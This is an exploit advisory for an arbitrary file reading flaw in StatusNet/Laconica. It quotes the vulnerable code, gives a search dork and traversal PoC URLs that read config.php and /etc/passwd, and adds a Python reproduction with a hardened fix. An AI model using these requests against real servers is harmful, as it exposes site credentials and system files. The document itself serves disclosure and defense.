StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 – Arbitrary File Reading

  • Author: spiderboy
    Date: 2013-10-14
  • Category: Webapps
    Platform: php
  • Source: https://www.exploit-db.com/exploits/28956/
  • +-------------------------------------------------------------------------------+
    + StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
    +-------------------------------------------------------------------------------+
    
    # Date:
    	- 10/10/2013
    
    # Exploit Author:
    	- spiderboy
    
    # Vendor Homepage:
    	- http://status.net/
    
    # Software Links:
    	- http://status.net/laconica-0.7.4.tar.gz
    	- http://status.net/statusnet-0.8.2.tar.gz
    	- http://status.net/statusnet-0.9.0beta3.tar.gz
    
    # Version:
    	- Branch 0.7.X : <= 0.7.4
    	- Branch 0.8.X : <= 0.8.2
    	- Branch 0.9.X : <= 0.9.0beta3
    
    # Tested on:
    	- Unix/Linux
    
    # Category:
    	- Webapps
    
    # Platform:
    	- php
    
    # Advisories :
    	- http://status.net/wiki/Security_alert_0000002
    	- http://osvdb.org/show/osvdb/95586
    
    # Google Dork:
    	- "It runs the StatusNet microblogging software, version 0.8.2"
    
    # Vendor product description:
    	- Free and Open Source social software
    
    # Vulnerable code:
    	- actions/doc.php:
    	--------------------------------------------------------------------
    	function handle($args)
    	{
    		parent::handle($args);
    		$this->title= $this->trimmed('title');
    		$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
    		if (!file_exists($this->filename)) {
    			$this->clientError(_('No such document.'));
    			return;
    		}
    		$this->showPage();
    	}
    	--------------------------------------------------------------------
    	[1] : $this->title is taken straight from the request (trimmed('title')) and concatenated into the path with no validation, so "../" sequences walk out of doc-src/ and any file the web server user can read is served back. Because file_exists() runs before the error is returned, the "No such document." response also doubles as a file-existence oracle for paths outside doc-src/.
    
    # Proof of concept:
    	- http://[host]/index.php?action=doc&title=../config.php
    	- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd
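    	The following is an added example and not StatusNet's code: it re-creates the path handling of the vulnerable handle() above in Python, builds the two PoC URLs for an assumed host name (statusnet.example), and places a hardened resolver (my own check, not the vendor's patch) beside the vulnerable one so both can be exercised offline against a throw-away install tree with a constructed config.php.

```python
"""Added example, not StatusNet's code: models the path handling of
actions/doc.php so the traversal and a hardened resolver can be run offline."""
import os
import tempfile
from urllib.parse import urlencode


def vulnerable_doc_path(installdir, title):
    """Mirrors INSTALLDIR.'/doc-src/'.$this->title: plain string concatenation,
    no validation, so '../' in title walks out of doc-src/."""
    return installdir + "/doc-src/" + title


def safe_doc_path(installdir, title):
    """Hardened resolver (assumption: my own fix, not the vendor's patch).
    A document title must be a single path component, and the resolved path
    must still sit under doc-src/ after realpath(), which also catches symlinks
    inside doc-src/ that point elsewhere."""
    docroot = os.path.realpath(os.path.join(installdir, "doc-src"))
    if (not title or title in (".", "..") or "/" in title
            or "\\" in title or "\0" in title):
        return None
    candidate = os.path.realpath(os.path.join(docroot, title))
    if os.path.commonpath([docroot, candidate]) != docroot:
        return None
    return candidate


def read_doc(installdir, title, resolver):
    """Equivalent of handle(): resolve the path, apply the file_exists() check,
    then return the file's text. None stands for the 'No such document.' error."""
    path = resolver(installdir, title)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def build_demo_install():
    """Constructed install tree: one legitimate document plus a config.php
    holding a made-up database password, the file the first PoC URL targets."""
    root = tempfile.mkdtemp(prefix="statusnet-demo-")
    os.makedirs(os.path.join(root, "doc-src"))
    with open(os.path.join(root, "doc-src", "about"), "w", encoding="utf-8") as fh:
        fh.write("About this site\n")
    with open(os.path.join(root, "config.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$config['db']['database'] = "
                 "'mysqli://statusnet:s3cret@localhost/statusnet';\n")
    return root


def poc_urls(host, depth=8):
    """The two PoC requests from the advisory, built for an assumed host name."""
    base = "http://" + host + "/index.php?"
    return [
        base + urlencode({"action": "doc", "title": "../config.php"}, safe="/"),
        base + urlencode({"action": "doc",
                          "title": "../" * depth + "etc/passwd"}, safe="/"),
    ]


if __name__ == "__main__":
    root = build_demo_install()
    for url in poc_urls("statusnet.example"):
        print(url)
    print("vulnerable:", read_doc(root, "../config.php", vulnerable_doc_path))
    print("hardened:  ", read_doc(root, "../config.php", safe_doc_path))
```

    	With the vulnerable resolver the "../config.php" title returns the constructed database credentials; with the hardened resolver it is rejected before any filesystem call, while a legitimate title such as "about" still resolves. The depth of eight "../" in the second PoC URL is only what the advisory uses; on a real target the count just has to be at least the depth of the install directory, since extra "../" at the filesystem root are ignored.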
    
    # Solution:
    	- Upgrade to the latest version : http://status.net/download
    	- Until the upgrade is applied, reject any "title" containing a path separator or ".." before it is concatenated into the doc-src/ path, so only a single file name inside doc-src/ can be requested.